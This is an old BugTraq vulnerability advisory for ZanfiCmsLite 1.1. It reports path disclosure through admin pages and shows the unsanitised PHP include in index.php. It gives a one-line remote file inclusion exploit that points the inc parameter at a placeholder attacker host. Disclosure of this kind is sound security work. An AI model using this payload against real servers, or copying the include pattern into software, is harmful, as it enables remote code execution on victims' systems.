BugTraq
Multiple vulnerabilities in ZanfiCmsLite Oct 11 2004 12:59PM
Lin Xiaofeng (Cracklove Gmail Com)


**********************************

*AuThor:Cracklove *

*emA!l:Cracklove[at]Gmail[dot]Com*

*HoMePaGe:http://ProxySky.com *

**********************************

[Info]

Website: http://www.zanfi.nl

Version: 1.1,The Newest Version

Problem: Full path disclosure,Include file

[Vuls]

1.Full path disclosure:

Let's try to request like this:

http://localhost/cms/adm_pages.php

and we get standard error messages like that:

Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in c:\appserv\www\cms\adm_pages.php on line 2

No blocks in the table

The Problem also in corr_pages.php,del_block.php,del_page.php,footer.php,home.php etc.

2.Include file

Ok let's open ./index.php,We see

if (!isset($inc)):

include ("home.php");

else:

include ($inc.".php");

endif;

O Yeah!See u Again Include Vul!

[Exploit]

http://target/index.php?inc=http://[Attacker]

[Fix]

Vuls has been reported to autuor,No reply yet.

[Greetings]

Greets To Lcx,Fatb,Envymask,S4T,ITS,CHT,WDYL,~The WhackerZ~ TeAm.

http://www.proxysky.com/vulz/show.php?id=3

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus